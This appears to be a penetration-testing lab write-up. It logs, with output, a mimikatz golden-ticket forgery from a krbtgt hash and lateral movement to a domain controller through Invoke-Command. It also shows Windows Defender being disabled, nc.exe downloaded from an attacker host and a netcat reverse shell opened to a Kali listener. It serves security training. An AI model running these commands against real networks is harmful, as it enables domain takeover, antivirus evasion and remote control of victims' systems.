172.16.243.192

接172.16.243.180生成的黄金票据，可以对192进行访问：

c:\\Users\\Administrator\\Desktop>**mimikatz.exe "kerberos::golden /user:Administrator /domain:final.com /sid:S-1-5-21-1725955968-4040474791-670206374 /krbtgt:405854caaf49b41e0e585369a001f114 /sids:S-1-5-21-1725955968-4040474791-670206374-519 /ptt" "exit"**
mimikatz.exe "kerberos::golden /user:Administrator /domain:final.com /sid:S-1-5-21-1725955968-4040474791-670206374 /krbtgt:405854caaf49b41e0e585369a001f114 /sids:S-1-5-21-1725955968-4040474791-670206374-519 /ptt" "exit"

  .#####.   mimikatz 2.2.0 (x64) #18362 Jan  4 2020 18:59:26
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \\ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \\ / ##       > <http://blog.gentilkiwi.com/mimikatz>
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > <http://pingcastle.com> / <http://mysmartlogon.com>   ***/

mimikatz(commandline) # kerberos::golden /user:Administrator /domain:final.com /sid:S-1-5-21-1725955968-4040474791-670206374 /krbtgt:405854caaf49b41e0e585369a001f114 /sids:S-1-5-21-1725955968-4040474791-670206374-519 /ptt
User      : Administrator
Domain    : final.com (FINAL)
SID       : S-1-5-21-1725955968-4040474791-670206374
User Id   : 500
Groups Id : *513 512 520 518 519 
Extra SIDs: S-1-5-21-1725955968-4040474791-670206374-519 ; 
ServiceKey: 405854caaf49b41e0e585369a001f114 - rc4_hmac_nt      
Lifetime  : 8/4/2022 2:41:33 AM ; 8/1/2032 2:41:33 AM ; 8/1/2032 2:41:33 AM
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'Administrator @ final.com' successfully submitted for current session

mimikatz(commandline) # exit
Bye!

c:\\Users\\Administrator\\Desktop>more \\\\dc02.dev.final.com\\c$\\users\\administrator\\desktop\\proof.txt
more \\\\dc02.dev.final.com\\c$\\users\\administrator\\desktop\\proof.txt
3ef3d28e7d7769c0d5825b1a6e5ce5d2

S C:\\Users\\Administrator\\Desktop> Invoke-Command -ComputerName dc02.dev.final.com -ScriptBlock {whoami;ipconfig;hostname}
Invoke-Command -ComputerName dc02.dev.final.com -ScriptBlock {whoami;ipconfig;hostname}
final\\administrator

Windows IP Configuration

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 172.16.243.192
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 172.16.243.254
dc02

PS C:\\Users\\Administrator\\Desktop> **Invoke-Command -ComputerName dc02.dev.final.com -ScriptBlock {Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -Verbose}**
Invoke-Command -ComputerName dc02.dev.final.com -ScriptBlock {Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -Verbose}
VERBOSE: Performing operation 'Update MSFT_MpPreference' on Target 'ProtectionManagement'.

PS C:\\Users\\Administrator\\Desktop> **Invoke-Command -ComputerName dc02.dev.final.com -ScriptBlock {powershell.exe iwr -uri <http://192.168.49.243/nc.exe> -o c:\\Users\\Administrator\\Desktop\\nc.exe}**
Invoke-Command -ComputerName dc02.dev.final.com -ScriptBlock {powershell.exe iwr -uri <http://192.168.49.243/nc.exe> -o c:\\Users\\Administrator\\Desktop\\nc.exe}
PS C:\\Users\\Administrator\\Desktop> **Invoke-Command -ComputerName dc02.dev.final.com -ScriptBlock {c:\\Users\\Administrator\\Desktop\\nc.exe 192.168.49.243 80 -e cmd.exe}**
Invoke-Command -ComputerName dc02.dev.final.com -ScriptBlock {c:\\Users\\Administrator\\Desktop\\nc.exe 192.168.49.243 80 -e cmd.exe}

┌──(kali㉿kali)-[/usr/share/windows-binaries]
└─$ nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.49.243] from (UNKNOWN) [192.168.243.189] 63152
Microsoft Windows [Version 10.0.17763.1518]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\\Users\\Administrator.FINAL\\Documents>hostname
hostname
dc02

C:\\Users\\Administrator.FINAL\\Documents>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 172.16.243.192
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 172.16.243.254

C:\\Users\\Administrator.FINAL\\Documents>whoami
whoami
final\\administrator

C:\\Users\\Administrator.FINAL\\Documents>

C:\\Users\\Administrator.FINAL\\Documents>more c:\\Users\\Administrator\\Desktop\\proof.txt
more c:\\Users\\Administrator\\Desktop\\proof.txt
3ef3d28e7d7769c0d5825b1a6e5ce5d2

C:\\Users\\Administrator.FINAL\\Documents>